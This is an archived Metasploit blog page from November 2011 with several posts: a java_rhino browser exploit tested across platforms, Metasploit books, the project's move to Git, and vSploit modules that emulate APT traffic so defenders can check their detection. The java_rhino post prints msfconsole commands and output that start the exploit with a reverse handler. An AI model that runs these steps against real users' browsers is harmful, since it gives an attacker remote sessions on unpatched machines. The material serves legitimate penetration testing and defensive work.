Skip navigation
All Places > Metasploit > Blog > 2011 > November
2011

@_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one.  To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running java, you can use  this link, and click “Do I have Java?”  below the big red 'Free Java Download' button."

 

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and is an easy-to-exploit client-side that does little to make the user aware they're being exploited.

 

Microsoft Windows:

 

Both Windows XP and Windows 7 were tested for vulnerability, a session was generated in every browser that was tested when the system was running java versions prior to the latest. Note that Chrome did prompt the user to let them know the java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.

 

WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Ubuntu Linux:

 

Several linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin. The Iced Tea java plugin was determined to not be vulnerable, though it wasn't tested extensively, it may still be vulnerable.

 

An attempt was made to update the Ubuntu 10.04 device, and the java package was downloaded and linked to system java, however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395 .html - However, even after following these instructions, i was unable to get this process to work, and simply disabled java on the vulnerable device.

 

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not, however, when i went to disable the plugin, i noticed that the 'update' button lead me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

 

Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories

Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories

Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin

 

Apple OS X:

 

Interesting issue here, I was forced to update, restart, then update again to get the updated sun java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus, a second update was required to get the latest java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

 

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.

 

OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Testing for the java_rhino vulnerability:

 

You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers, it will be available in the Pro / Express / Community product later today.


msf  exploit(handler) > use exploit/multi/browser/java_rhino

msf  exploit(java_rhino) > info

msf  exploit(java_rhino) > set URIPATH xxxx

msf  exploit(java_rhino) > exploit

 

[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.11:4444

[*] Using URL: hxxp://0.0.0.0:8080/xxxx

[*]  Local IP: hxxp://10.0.0.11:8080/xxxx

[*] Server started.

 

Point vulnerable systems at the URL, and wait for your sessions.

I've seen three great Metasploit books published lately. The one that most people are probably already familiar with is Metasploit: The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns and Mati Aharoni. The book is very comprehensive, and packed full of great advice. David Kennedy is Chief Information Security Officer at Diebold Incorporated and creator of the Social-Engineer Toolkit (SET), Fast-Track, and other open source tools, so he really knows his stuff. By the way, Rapid7's HD Moore wrote the foreword for this book. (Get sample chapter and 30% discount code)

 

The other two books were both published in German, but I know that Metasploit has a huge following in Germany, so I want to include them as well. The first one is Penetration Testing mit Metasploit: Eine praktische Einführung by Frank Neugebauer. It's a perfect book if you're just getting started with Metasploit and need a good primer. Frank is working for the Computer Emergency Response Team der Bundeswehr (CERTBw) as an IT Security Specialist. (Get sample chapters)

 

There's also Metasploit: Das Handbuch zum Penetration-Testing-Framework by Michael Messner, a much more comprehensive book that is a great reference work for advanced Metasploit users. Mike works as a Senior IT Security Consultant for Integralis in Germany. He conducts security assessments, penetration tests, and gives trainings for Metasploit. I'd like to thank Mike for giving me the opportunity to write the foreword for this great book. (Get sample chapters)

 

In case you'd like to order your copy of these books, I've linked the covers to the Amazon order page.

 

kennedy.jpg   Neugebauer.jpg    messsner.jpg

hd-moore200px1.jpgAt Metricon6 and later on his blog Cognitive Dissidents, Joshua Corman presented his latest discovery - HD Moore's Law:

 

"Casual Attacker power grows at the rate of Metasploit"

 

Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure.

 

HD Moore created the Metasploit Project in 2003 to provide the security community with a public resource for exploit development. This project resulted in the Metasploit Framework, an open source platform for writing security tools and exploits.

 

The Metasploit Framework took away some of the "black magic" components of hacking, making it accessible to network admins and security professionals with "lesser powers" to run typical hacking attacks against their own network to see if the network is vulnerable. They could then use these findings to remediate any security issues they found. This is still true today.

 

At the same time, this commoditization of exploit tools made it easier for a casual attacker to exploit other people's network, and this is where Joshua Corman's comment comes in: If you can breach your own network, then someone else can too. Because Metasploit is the industry's leading penetration testing tool with about 120,000 users, it is both the best way to test your network's security and also the most likely vector of attack.

 

Thanks Josh, for calling out this law, and for suggesting that people should test if they meet the "Metasploit minimum bar". If you'd like to test your own network, you can download a free copy of Metasploit here.

hdmoore

Git while the gitting is good

Posted by hdmoore Nov 10, 2011

The Metasploit Framework has grown in leaps and bounds: what used to be a small team of free-time developers is now an actual product team working for a real company. The community that contributes to the open source framework has continued to expand; instead of a few of active contributors, we now have over a dozen, not counting all of the drive-by-coders that submit patches and modules through the Redmine tracking system. As the code base grows, so does our user base, and quality has become the most important feature of the product.

 

The huge number of contributions on one hand, and the quality demands on the other, have lead to a situation where our existing development process was starting to feel the strain. To keep up with the load, we have made major investments in our automated quality testing. Continous integration tools, automated lab management APIs, and other changes to the code base have helped us keep up with the increasing size of the project. The development tools, however, were still significantly lacking.

 

I'll admit it. I used CVS and Bugzilla until 2005. I have been using Subversion and Trac/Redmine ever since. The latest and greatest in source code management tools has always seemed less interesting to me than the actual code I was working on - if the solution worked, there wasn't any strong reason to move away from it. We have finally reached the point where a centralized development model we have today was making it hard for folks outside the project to easily contribute. Even folks who had direct commit access could use a better branching model and testing process before pushing those changes back into the development trunk.

 

All development on the Metasploit Framework (along with warvox, msfrpc-client, and nexpose-client) is now managed though the Git SCM and the GitHub.com development portal. This is is a major change for a few reasons:

 

  • Anyone can fork the official repository, modify the code, and send a pull request. All existing developers will use this exact model. This makes contributing a module and getting peer review nearly painless.

 

  • Anyone can fork the offiical repository, add their own code to this fork, and make this available to other Metasploit Framework users. GitHub provides both Git and Subversion access to all hosted respositories, including forks like this. Switching to an experimental branch takes three commands:

 

# cd /opt/metasploit-4.1.4

# mv msf3 msf3.official

# svn co https://svn.github.com/<YOUR NAME>/metasploit-framework.git msf3


  • All merges to the official repository are signed off by a Rapid7 employee. This may seem restrictive, but the goal is to increase accountability and prevent dumb bugs from making their way into the code base. This code review happens today, but bugs can still slip past when a developer merges an external patch without adequate review. Git's branching model and pull request system will make this process painless and transparent. This overhead is balanced by the fact that any developer can publish their personal fork while their changes go through code review.

 

This changes the development process, but keeps the existing Subversion update mechanism, along with msfupdate and other svn-based tools working as-is. This was accomplished through a pile of custom code currently named "Charon"; merges to the master branch in GitHub are replicated to our existing Subversion repository, which is mirrored through the standard https://metasploit.com/svn/framework3/trunk/ URL. If you use Subversion today to keep updated, keep using it. This architecture lets us introduce additional quality checks between merges to Git and their replication to the Subversion trunk and will not be going away anytime soon.

 

A huge thanks to Matt Buck and Trevor Rosen who gave up any pretense of a work-life balance for the last week to make this happen. This is one of many changes coming to the project to expand opportunities for collaboration while continuing to raise the quality bar.

 

-HD

Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit's Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone's file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple's coding signing requirements, which allowed him to run arbitrary code on the iPhone.

 

 

I created a couple of new vSploit modules to allow organizations to test their abilities for APT-type activity detection. There are already a few vSploit modules in the Metasploit trunk and you should see several more modules added next year. I will keep coding vSploit modules in my spare time to fill critical needs when I see them. I have created a new DNS beaconing module and filestream module and posted them to my GitHub account (links below).

 

DNS_Red

There have been two really good sources of information recently on malicious domain names. If you didn't get a chance to check the following two links out, they are must reads:

http://www.secureworks.com/research/threats/htran/

http://pastebin.com/yKSQd5Z5

 

I grabbed all of the domains, sorted, and eliminated duplicates and threw them into a vSploit module.

This module is available for download at my GitHub account: https://github.com/threatagent/vSploit/blob/master/vSploit/dns_red.rb

 

I believe that it is essential that organizations, especially DoD and .Gov agencies are able to detect suspicious domains like the following. The process is simple 1) Run the vSploit module 2) Is your DNS logging/ monitoring/ picking up this activity?

 

If you can't see the activity you need to put something in place to make that happen.

2011-10-07_1743.png

vSploit filestream

 

If you are familiar with what's going on with current attacks, you may know that attackers tend to compress files, ie. encrypted RAR files and exfiltrate. Many times attackers are able to send these in plain text over networks without detection. I don't know too many places, especially government related, that run RAR software on their network. I could be totally wrong on that point, but I haven't seen it. The filestream module sends datastreams to emulate malicious files by sending a matching file header with hex padding.

 

The module currently sends filestreams emulating EXE (Windows Executables), ZIP (ZIP Archives), RAR (RAR Archives), and ELF (Linux/UNIX Executables). This module works with TCP/UDP and requires a listener port. Although the filetypes may be common in some environments, there are definitely cases where they shouldn't be traversing networks. Regardless, organizations should be able to see this activity.

 

GitHub link: https://github.com/threatagent/vSploit/blob/master/vSploit/vsploit_filestream.rb

2011-10-07_1809.png

Wireshark capture of RAR filestream:

 

2011-10-07_1811.png

 

These modules can definitely help some environments. As always I've love your feedback. Please leave a comment below.

iStock_000005083391XSmall.jpgI often hear from technical IT folks that communicating the benefit of a penetration test is difficult, especially to a business audience. "You want me to authorize you to break into my systems?" they ask.

 

We are all afraid of things we don't understand. This is why you should first make your management comfortable with the concept of penetration testing. Why don't you try this example: We should all visit our doctor for regular medical check-ups, even when we feel healthy. This is the only way to recognize and treat grave illnesses early. Such an exam should be obvious to every responsible adult who wants to protect his family and himself in the long-term.

 

Likewise, penetration testing should also be conducted regularly on important systems so we can detect where our systems are vulnerable. We have to find these vulnerabilities before criminals, spies, and cyber punks can harm our enterprise. Penetration tests are one of the tools for responsible IT management to identify and mitigate risks. As with a health check, you should entrust this to trained experts: medical doctors and penetration testers.

 

Have you found a different way of explaining penetration testing to your business audience? Please share your experience of what works and what doesn't with your peers by posting a comment below.

 

If you enjoyed this post, you may also like the white paper "How to Justify Your Security Assessment Budget".

Filter Blog

By date: By tag: